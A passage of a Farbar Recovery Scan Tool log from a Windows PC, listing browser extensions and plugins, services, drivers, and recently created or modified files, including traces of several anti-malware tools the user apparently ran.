FF Extension: (Undo Closed Tabs Button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\undoclosedtabsbutton@supernova00.biz.xpi [2016-08-26] [Legacy]
FF Extension: (Zotero Connector) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\zotero@chnm.gmu.edu.xpi [2017-12-14]
FF Extension: (Zotero Word for Windows Integration) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\zoteroWinWordIntegration@zotero.org [2016-10-15] [Legacy]
FF Extension: (uBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{2b10c1c8-a11f-4bad-fe9c-1c11e82cac42}.xpi [2015-12-05] [Legacy]
FF Extension: (FT DeepDark) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{77d2ed30-4cd2-11e0-b8af-0800200c9a66} [2017-10-17] [Legacy]
FF Extension: (All-in-One Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{8b86149f-01fb-4842-9dd8-4d7eb02fd055} [2016-04-27] [Legacy]
FF Extension: (Single Key Tab Switch) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a66191d8-898b-4a66-89be-d5b279477a54}.xpi [2015-12-31] [Legacy]
FF Extension: (LeechBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a95d8332-e4b4-6e7f-98ac-20b733364387} [2017-11-15] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_28_0_0_161.dll [2018-02-06] ()
FF Plugin: @java.com/DTPlugin,version=1.6.0_45 -> C:\Windows\system32\npdeployJava1.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_28_0_0_161.dll [2018-02-06] ()
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2014-01-06] (Google, Inc.)
FF Plugin-x32: @live.heroesandgenerals.com/npretox -> D:\Spel\Heroes & Generals\live\npretox-1.0.6.1\npretoxlive-1.0.6.1.dll [2014-05-07] (Reto-Moto ApS)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-07-19] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @mozilla.zeniko.ch/SumatraPDF_Browser_Plugin -> C:\Program Files (x86)\SumatraPDF\npPdfViewer.dll [2013-10-02] (Simon Bünzli)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1755371218-3412237994-1746218496-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Martin\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-12-27] (Unity Technologies ApS)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\secure_cert.js [2018-03-01]

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default [2018-03-19]
CHR Extension: (Slides) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-19]
CHR Extension: (Docs) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-19]
CHR Extension: (Google Drive) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-12]
CHR Extension: (YouTube) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Google Search) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-12]
CHR Extension: (Sheets) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-19]
CHR Extension: (Heroes & Generals) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbophcdhblbipoaacgchllkobdaolpge [2014-05-11]
CHR Extension: (Google Docs Offline) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-10-20]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-23]
CHR Extension: (Gmail) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-15]
CHR Extension: (Chrome Media Router) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-01-23]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ATTENTION: => Could not perform signature verification. Cryptographic Service is not running.

S4 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [7013384 2018-02-08] ()
S4 DisplayFusionService; C:\Program Files (x86)\DisplayFusion\DisplayFusionService.exe [1375600 2013-11-27] (Binary Fortress Software)
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [399120 2017-02-13] (EasyAntiCheat Ltd)
S4 HiPatchService; D:\Spel\Tribes Ascend\HiPatchService.exe [9728 2017-07-12] (Hi-Rez Studios)
S4 HnGSteamService; D:\Spel\Steam Library\steamapps\common\Heroes & Generals\hngservice.exe [777000 2018-02-27] (Reto-Moto ApS)
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6234056 2017-11-01] (Malwarebytes)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
S3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
S4 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 Origin Client Service; D:\Spel\Origin\OriginClientService.exe [2122248 2016-06-25] (Electronic Arts)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [66872 2013-11-11] ()
R2 PnkBstrB; C:\Windows\SysWOW64\PnkBstrB.exe [107832 2013-11-11] ()
S4 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] ()
S4 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1776864 2017-05-23] (Safer-Networking Ltd.)
S4 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2131760 2017-05-23] (Safer-Networking Ltd.)
S4 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [233936 2017-05-23] (Safer-Networking Ltd.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5419792 2014-11-28] (TeamViewer GmbH)
S4 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [814064 2015-12-22] (Tunngle.net GmbH)
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S4 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe [473312 2017-03-20] (Wondershare)
S4 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
S4 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2013-10-18] (Disc Soft Ltd)
R3 ElbyCDFL; C:\Windows\System32\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
R3 ElbyCDFL; C:\Windows\SysWOW64\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2015-05-08] ()
S3 I1KBFLTR; C:\Windows\System32\drivers\I1KBFLTR.sys [29440 2014-06-26] ()
S3 massfilter_hs; C:\Windows\system32\drivers\massfilter_hs.sys [20232 2012-06-08] (HandSet Incorporated)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253880 2018-03-02] (Malwarebytes)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [31024 2018-01-10] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [59240 2017-12-15] (NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [57976 2017-11-16] (NVIDIA Corporation)
S3 OCUSBVID; C:\Windows\System32\DRIVERS\OCUSBVID.sys [62072 2015-06-16] (Oculus VR, LLC)
R3 rzdaendpt; C:\Windows\System32\DRIVERS\rzdaendpt.sys [43720 2015-08-13] (Razer Inc)
S3 rzp1endpt; C:\Windows\System32\DRIVERS\rzp1endpt.sys [50904 2015-08-13] (Razer Inc)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [130880 2015-12-14] (Razer, Inc.)
R3 rzvkeyboard; C:\Windows\System32\DRIVERS\rzvkeyboard.sys [44232 2015-08-13] (Razer Inc)
S3 rzvmouse; C:\Windows\System32\DRIVERS\rzvmouse.sys [42712 2015-08-13] (Razer Inc)
S3 SaiK075C; C:\Windows\System32\DRIVERS\SaiK075C.sys [179872 2014-08-05] (Saitek)
R3 SaiMini; C:\Windows\System32\DRIVERS\SaiMini.sys [25120 2013-04-30] (Saitek)
R3 SaiNtBus; C:\Windows\System32\drivers\SaiBus.sys [52640 2013-04-30] (Saitek)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [381440 2013-10-18] (Duplex Secure Ltd.)
S3 ssdevfactory; C:\Windows\System32\DRIVERS\ssdevfactory.sys [46408 2017-06-02] (SteelSeries ApS)
R3 tap0901t; C:\Windows\System32\DRIVERS\tap0901t.sys [47736 2015-12-21] (Tunngle.net)
S3 xb1usb; C:\Windows\System32\DRIVERS\xb1usb.sys [34016 2014-05-27] (Microsoft Corporation)
S3 zghsmdm; C:\Windows\System32\DRIVERS\zghsmdm.sys [131080 2012-06-08] (ZTE Incorporated)
U3 a48h1yy9; C:\Windows\System32\Drivers\a48h1yy9.sys [0 ] (Advanced Micro Devices) <==== ATTENTION (zero byte File/Folder)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-21 20:47 - 2018-03-21 20:47 - 000002759 _____ C:\Users\Public\Desktop\Sophos Virus Removal Tool.lnk
2018-03-21 20:47 - 2018-03-21 20:47 - 000000000 ____D C:\ProgramData\Sophos
2018-03-21 20:47 - 2018-03-21 20:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sophos
2018-03-21 20:47 - 2018-03-21 20:47 - 000000000 ____D C:\Program Files (x86)\Sophos
2018-03-19 19:58 - 2018-03-19 20:33 - 000000000 ____D C:\ProgramData\RogueKiller
2018-03-19 19:58 - 2018-03-19 19:58 - 000028272 _____ C:\Windows\system32\Drivers\TrueSight.sys
2018-03-19 19:57 - 2018-03-19 19:57 - 000000867 _____ C:\Users\Public\Desktop\RogueKiller.lnk
2018-03-19 19:57 - 2018-03-19 19:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2018-03-19 19:57 - 2018-03-19 19:57 - 000000000 ____D C:\Program Files\RogueKiller
2018-03-18 09:03 - 2018-03-22 06:55 - 000000000 ____D C:\FRST
2018-03-02 11:07 - 2018-03-02 11:11 - 000000000 ____D C:\AdwCleaner
2018-03-02 10:21 - 2018-03-22 06:53 - 000000258 __RSH C:\ProgramData\ntuser.pol
2018-03-02 09:25 - 2018-03-02 09:25 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\642A2717.sys
2018-03-02 09:16 - 2018-03-19 16:55 - 000192952 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2018-03-02 09:16 - 2018-03-02 09:44 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2018-03-02 09:16 - 2018-03-02 09:16 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\5143D20B.sys
2018-03-02 09:16 - 2018-03-02 09:16 - 000000000 ____D C:\Program Files (x86)\mbar
2018-03-02 08:24 - 2018-03-02 08:24 - 000001404 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000001392 _____ C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000000656 _____ C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000628 _____ C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000458 _____ C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2017-05-23 09:22 - 000032240 _____ (Safer-Networking Ltd.) C:\Windows\system32\sdnclean64.exe
2018-03-02 08:21 - 2018-03-02 08:21 - 000000085 _____ C:\Windows\wininit.ini
2018-03-02 08:11 - 2018-03-22 06:53 - 000000258 __RSH C:\Users\Martin\ntuser.pol
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}
2018-03-02 07:57 - 2018-03-02 07:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-03-01 17:27 - 2018-03-01 17:27 - 000000000 ____D C:\Program Files\Malwarebytes
2018-03-01 17:27 - 2017-11-29 09:11 - 000077432 _____ C:\Windows\system32\Drivers\mbae64.sys
2018-03-01 17:14 - 2018-03-20 17:00 - 001661758 _____ C:\Windows\ntbtlog.txt
2018-03-01 17:10 - 2018-03-01 17:10 - 000001032 _____ C:\Users\Public\Desktop\Lightning.lnk
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightning
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\Program Files (x86)\Lightning
2018-03-01 17:09 - 2018-03-02 09:14 - 000000000 ____D C:\Disk
2018-03-01 17:09 - 2018-03-02 08:00 - 000000000 ____D C:\Windat
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lookup Pro
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\Program Files\LaCie Private Public
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\Martin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Windows\system32\Drivers\NVIDIA Corporation
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2018-02-26 15:18 - 2018-02-23 20:28 - 000136536 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2018-02-26 15:18 - 2017-12-08 23:25 - 000798520 _____ C:\Windows\SysWOW64\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:25 - 000490808 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2018-02-26 15:18 - 2017-12-08 23:24 - 000928568 _____ C:\Windows\system32\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:24 - 000591672 _____ C:\Windows\system32\vulkaninfo.exe
2018-02-26 15:17 - 2018-02-25 06:41 - 035619872 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 028201048 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 017353248 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2018-02-26 15:17 - 2018-02-25 06:40 - 000996768 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000625512 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000514544 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:39 - 000948128 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 040277488 _____ (NVIDIA Corporation) C:\Windows\system32\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003913016 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003443800 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001985384 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001684000 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001137512 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001064760 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2018-02-26 15:17 - 2018-02-25 06:37 - 035188640 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 019854312 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 013571008 _____ (NVIDIA Corporation) C:\Windows\system32\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 011131696 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 000419488 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 016496080 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 001153752 _____ (NVIDIA Corporation) C:\Windows\system32\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000902280 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000541672 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000460024 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000182600 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000164952 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000159712 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000142816 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 018910384 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 012966032 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 011000288 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 003918512 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\SysWOW64\nv-vk32.json
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\system32\nv-vk64.json
2018-02-26 14:45 - 2017-12-15 03:03 - 000059240 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2018-02-23 15:09 - 2018-02-23 15:09 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Piece of Cake studios

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-22 06:53 - 2013-10-17 21:32 - 000000000 ____D C:\Users\Martin
2018-03-21 20:43 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-03-20 20:10 - 2009-07-14 06:08 - 000032620 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2018-03-20 16:54 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-03-20 16:54 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-03-19 20:07 - 2013-11-14 20:32 - 000000000 ____D C:\Users\Martin\AppData\Local\NVIDIA Corporation
2018-03-19 20:07 - 2013-10-17 21:57 - 000000000 ____D C:\ProgramData\NVIDIA
2018-03-19 16:51 - 2014-10-08 23:05 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Temp
2018-03-19 16:50 - 2014-08-16 13:47 - 000000000 ____D C:\Windows\Minidump
2018-03-02 11:13 - 2015-05-08 17:01 - 000253880 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2018-03-02 11:12 - 2013-10-17 22:18 - 000000000 ____D C:\Program Files (x86)\Steam
2018-03-02 11:12 - 2013-10-17 09:50 - 000000000 ____D C:\Users\Martin\AppData\Local\LogMeIn Hamachi
2018-03-02 10:26 - 2009-07-14 06:13 - 000782470 _____ C:\Windows\system32\PerfStringBackup.INI
2018-03-02 10:26 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2018-03-02 10:21 - 2013-10-21 11:33 - 000000000 ____D C:\Users\Martin\AppData\Roaming\EVEMon
2018-03-02 08:24 - 2014-10-31 23:52 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2013-10-17 22:12 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2018-03-02 07:57 - 2013-10-17 21:55 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-03-01 17:28 - 2015-12-29 21:35 - 000000000 ____D C:\Users\Martin\AppData\Local\CrashDumps
2018-03-01 17:27 - 2014-11-01 00:45 - 000000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2018-03-01 17:24 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\Resources
2018-03-01 17:14 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2018-03-01 17:10 - 2014-05-11 08:30 - 000002233 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-03-01 17:08 - 2009-07-14 04:20 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2018-03-01 17:06 - 2015-08-01 20:51 - 000000000 ____D C:\Users\Martin\AppData\Roaming\qBittorrent
2018-03-01 17:06 - 2013-10-18 00:10 - 000000000 ____D C:\Users\Martin\AppData\Roaming\DAEMON Tools Lite
2018-03-01 17:05 - 2013-12-11 18:03 - 000000000 ____D C:\Users\Martin\AppData\Local\Battle.net
2018-03-01 16:51 - 2013-10-17 22:16 - 000000000 ____D C:\Users\Martin\AppData\Roaming\Skype
2018-03-01 08:21 - 2013-11-02 11:57 - 000000000 ____D C:\Users\Martin\AppData\Local\NVIDIA
2018-02-26 15:19 - 2017-12-10 03:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2018-02-26 15:19 - 2013-12-05 18:49 - 000000000 ____D C:\temp
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2018-02-26 14:45 - 2018-01-01 14:12 - 000004146 _____ C:\Windows\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003814 _____ C:\Windows\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003798 _____ C:\Windows\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003730 _____ C:\Windows\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003554 _____ C:\Windows\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003494 _____ C:\Windows\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:43 - 2016-01-03 15:27 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
